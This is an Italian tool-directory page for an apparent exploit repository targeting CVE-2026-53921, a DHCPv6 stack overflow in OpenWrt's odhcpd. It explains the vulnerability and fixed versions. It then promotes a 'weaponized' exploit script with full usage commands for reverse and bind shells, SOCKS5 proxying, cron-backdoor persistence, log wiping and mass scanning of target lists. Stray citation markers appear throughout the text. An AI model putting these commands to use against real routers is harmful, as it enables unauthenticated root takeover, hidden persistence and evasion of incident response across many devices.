Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – Stack Overflow in odhcpd (CVSS 9.8) 🛡️ Write-Up dettagliato e completo della vulnerabilità e Verifier & Multi-exploit per RCE DHCPv6 su OpenWrt. Overflow dual-vettore (IA_NA/IA_PD) con shellcode MIPS/ARM, catene ROP, proxy SOCKS5, persistenza, pulizia dei log e scansione di massa. Usalo in modo etico, resta legale. 🔒 | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
Sicurezza Sistemi EmbeddedRicognizioneFramework di ExploitSicurezza IoTAnalisi delle VulnerabilitàExploitPost-ExploitRed TeamingGenerazione di Shellcode

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

CVE-2026-53921 – Stack Overflow in odhcpd (CVSS 9.8) 🛡️ Write-Up dettagliato e completo della vulnerabilità e Verifier & Multi-exploit per RCE DHCPv6 su OpenWrt. Overflow dual-vettore (IA_NA/IA_PD) con shellcode MIPS/ARM, catene ROP, proxy SOCKS5, persistenza, pulizia dei log e scansione di massa. Usalo in modo etico, resta legale. 🔒

Sviluppo Payload
Binary Exploitation
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

Vedi Repository
671 mese faNon ancora revisionato
Condividi

CVE-2026-53921

CVE-2026-53921 – Overflow dello stack in odhcpd

CVE CVSS OpenWrt

⚠️ Solo per test educativi e autorizzati. L'uso non autorizzato è illegale.


📖 Panoramica della Vulnerabilità

CVE-2026-53921 è un overflow del buffer di stack critico nel demone odhcpd di OpenWrt, il server DHCPv6/DHCPv4/RA predefinito.

🔍 Come funziona

La vulnerabilità risiede nel codice di gestione dei messaggi DHCPv6 di odhcpd, in particolare nelle funzioni build_ia() e dhcpv6_ia_handle_IAs().

Approfondimento Tecnico

1. La Causa Principale

Il bug si verifica durante la serializzazione (assemblaggio) dei pacchetti di risposta DHCPv6. Quando odhcpd risponde alle richieste dei client, costruisce la risposta in un buffer di stack a dimensione fissa di 512 byte senza un adeguato controllo dei limiti.

root@kitploit:~
// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. Come si Attiva l'Overflow

Un attaccante invia una richiesta DHCPv6 (Request o Solicit) con:

  • 5 o più opzioni IA_NA (Identity Association for Non-temporary Address), ciascuna contenente una sotto-opzione IAAddress.
  • 22 o più opzioni IA_PD (Identity Association for Prefix Delegation).

Ogni opzione consuma spazio nello stack mentre odhcpd costruisce la propria risposta. I dati accumulati superano 512 byte, causando l'overflow.

3. Due Vettori di Overflow


Vettore Attivazione Punto di Overflow


Sito 1 5 opzioni IA_NA build_ia() per IA_NA con indirizzi IPv6

Sito 2 22 opzioni IA_PD build_ia() per IA_PD

La causa principale è identica, ma l'overflow si verifica in percorsi di codice diversi, rendendo entrambi i vettori ugualmente sfruttabili.

4. Layout della Memoria

root@kitploit:~
Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

L'attaccante sovrascrive l'indirizzo di ritorno salvato per puntare al proprio shellcode in memoria.

5. Requisiti per lo Sfruttamento


Requisito Descrizione


Accesso alla rete L'attaccante deve avere connettività IPv6 verso il bersaglio

Autenticazione Nessuna -- attacco non autenticato

Privilegi odhcpd viene eseguito come root, quindi l'RCE garantisce il controllo completo del sistema

Servizio bersaglio La porta UDP 547 (DHCPv6) deve essere aperta

6. Posizionamento dello Shellcode

In un exploit reale, lo shellcode dell'attaccante viene inserito nei campi degli indirizzi IPv6 IAAddress (16 byte per IA_NA). I pacchetti appositamente costruiti racchiudono lo shellcode, la NOP sled e l'indirizzo di ritorno in questi campi.

root@kitploit:~
Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. Catena d'Impatto

root@kitploit:~
Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. Vettori d'Attacco vs. Stato di Mitigazione

Versione Stato RCE Possibile?


odhcpd < e432dd6 Vulnerabile ✅ Sì OpenWrt < 24.10.8 Vulnerabile ✅ Sì OpenWrt < 25.12.5 Vulnerabile ✅ Sì OpenWrt 24.10.8+ Corretto ❌ No OpenWrt 25.12.5+ Corretto ❌ No odhcpd master + e432dd6 Corretto ❌ No

9. Sfruttamento nel Mondo Reale

Questa vulnerabilità è particolarmente pericolosa perché:

  • odhcpd è abilitato per impostazione predefinita nelle installazioni OpenWrt.
  • Non è richiesta alcuna autenticazione---qualsiasi dispositivo sullo stesso segmento IPv6 può attaccare.
  • Il bug si trova nel percorso di elaborazione delle richieste.
  • I canary di stack e l'ASLR sono raramente presenti sui dispositivi embedded MIPS/ARM.
  • L'exploit può aggirare le difese comuni in molti ambienti embedded.

🎯 Versioni interessate

ComponenteVersioni vulnerabiliCorretta in
odhcpd (ramo master)prima del commit e432dd6e432dd6 o successivi
Release di OpenWrt< 24.10.8 < 25.12.5

🧰 Strumenti

Questo repository fornisce due script indipendenti:

ScriptScopoCodice exploitSicurezza
verifier.pyVerifica della vulnerabilità non intrusiva❌ No✅ Sicuro
exploit.pyExploit completo weaponizzato

🔎 verifier.py – Verifica della Vulnerabilità

  • Invia una Solicit DHCPv6 standard per verificare che il servizio sia attivo.
  • Legge i banner HTTP/SSH per rilevare la versione di OpenWrt.
  • Confronta la versione con l'intervallo vulnerabile noto.
  • Non invia alcun payload di overflow o shellcode.

💥 exploit.py – Exploit Completo

  • Vettori di overflow duali: IA_NA (Sito 1) e IA_PD (Sito 2).
  • Rilevamento automatico dell'architettura (MIPS / ARM).
  • Shellcode reverse e bind per MIPS big-endian.
  • Supporto per proxy SOCKS5.
  • Persistenza (backdoor via cron) e cancellazione dei log.
  • Scansione multi-thread e sfruttamento di massa.
  • Codifica opzionale del payload (XOR).

🚀 Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 Utilizzo

🔍 Verifier – verifica se un bersaglio è vulnerabile

root@kitploit:~
sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 Exploit – ottieni una reverse shell (non usare per attività illegali, solo per test avanzati)

root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ Opzioni della Riga di Comando

verifier.py

ArgomentoDescrizione
-u, --targetIndirizzo IPv6 del bersaglio (obbligatorio)
-i, --ifaceInterfaccia di rete (predefinita: eth0)

exploit.py

🧪 Scenari di Esempio

1. Scansiona un elenco di bersagli

root@kitploit:~
sudo python3 exploit.py -l targets.txt --scan-only --threads 10
root@kitploit:~
### 2. Exploit a single target with bind shell
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --payload bind --lport 31337
root@kitploit:~
### 3. Use SOCKS5 proxy + persistence + log wiping
root@kitploit:~
sudo python3 exploit.py -u fe80::1%eth0 --lhost 192.168.1.100 --proxy-host 127.0.0.1 --proxy-port 9050 --persistence --clear-logs

🛡️ Mitigazione

Aggiorna OpenWrt a 24.10.8 o 25.12.5 o versioni successive.

root@kitploit:~
opkg update
opkg upgrade odhcpd

📌 Riferimenti

Fonti Ufficiali

  • OpenWrt Security Advisory (GHSA-7fwx-hhrg-3496) https://github.com/openwrt/odhcpd/security/advisories/GHSA-7fwx-hhrg-3496 Avviso dettagliato che copre entrambi i vettori di overflow in odhcpd.

  • CVE-2026-53921 NVD Entry https://nvd.nist.gov/vuln/detail/CVE-2026-53921 Voce ufficiale del database delle vulnerabilità NIST.

  • OpenWrt 24.10.8 Release Notes https://forum.openwrt.org/t/openwrt-24-10-8-service-release/252195 Annuncio di rilascio ufficiale per il ramo 24.10.

  • OpenWrt 25.12.5 Release Notes https://lists.openwrt.org/pipermail/openwrt-announce/2026-June/000088.html Annuncio di rilascio ufficiale per il ramo 25.12.

CVE Correlati Corretti nella Stessa Release

Le release 24.10.8 e 25.12.5 risolvono molteplici vulnerabilità di odhcpd oltre alla CVE-2026-53921 [citation:9]:

Analisi Tecnica e Write-up

  • The Hacker News Analysis https://thehackernews.com/2026/07/critical-openwrt-dhcpv6-flaw-could-let.html Analisi tecnica dettagliata della vulnerabilità e dei vettori di sfruttamento. [citation:1]

  • GitHub PoC Repository https://github.com/0xBlackash/CVE-2026-53921 Implementazioni proof-of-concept pubbliche e dettagli tecnici. [citation:3]

Ulteriori Correzioni di Sicurezza in 25.12.5

La versione 25.12.5 affronta anche vulnerabilità in altri componenti principali [citation:10]:

  • uhttpd: HTTP request smuggling (CVE-2026-55612, CVE-2026-55614)
  • LuCI: Molteplici difetti di escalation dei privilegi e XSS
  • cgi-io: Path traversal autenticato
  • Linux Kernel: Aggiornato a 6.12.94 con molteplici CVE
  • OpenSSL: Aggiornato a 3.5.7 risolvendo numerosi CVE
  • Dropbear SSH: Corrette CVE-2019-6111 e CVE-2026-35385

Documentazione di Supporto

  • OpenWrt Firmware Selector https://firmware-selector.openwrt.org/ Scarica le immagini firmware corrette per il tuo dispositivo.

  • CISA Known Exploited Vulnerabilities Catalog https://www.cisa.gov/known-exploited-vulnerabilities-catalog Verifica se CVE-2026-53921 è stata aggiunta al catalogo KEV (al 27 luglio 2026, non elencata). [citation:1]

Scarica lo strumento

24.10.8 e 25.12.5
✅ Sì
⚠️ Pericoloso
ArgomentoDescrizione
-u, --targetIndirizzo IPv6 del bersaglio
-l, --listFile con elenco di bersagli
-i, --ifaceInterfaccia di rete (predefinita: eth0)
--lhostIP del listener (obbligatorio)
--lportPorta del listener (predefinita: 4444)
--vectorsite1, site2 o both (predefinito: both)
--offsetOffset dello stack (predefinito: 512)
--retIndirizzo di ritorno in esadecimale (es. 0x7ffff000)
--archForza mips o arm (rilevamento automatico se omesso)
--payloadreverse o bind (predefinito: reverse)
--encodenone o xor (predefinito: none)
--proxy-hostIP del proxy SOCKS5
--proxy-portPorta del proxy SOCKS5 (predefinita: 1080)
--persistenceInstalla backdoor via cron
--clear-logsCancella il syslog dopo lo sfruttamento
--scan-onlyScansiona solo i bersagli, non sfruttare
--threadsNumero di thread per la scansione (predefinito: 5)
--verboseRegistrazione dettagliata (verbose)
CVE IDGravitàDescrizione
CVE-2026-53918AltaUse-after-free nel gestore IA DHCPv6 [citation:4][citation:9]
CVE-2026-53920AltaDivulgazione di memoria dello stack tramite opzione DHCPv6 IA_NA/IA_PD troncata [citation:9]
CVE-2026-53922MediaDenial of service pre-autenticazione tramite underflow di size_t [citation:9]
CVE-2026-55606MediaOverread del buffer di stack dovuto a disallineamento di endianness nella lunghezza DUID [citation:9]
CVE-2026-62948-Iniezione del nome host DHCPv6 che porta a XSS persistente [citation:1]
CVE-2026-62947-Path traversal autenticato in cgi-io [citation:1]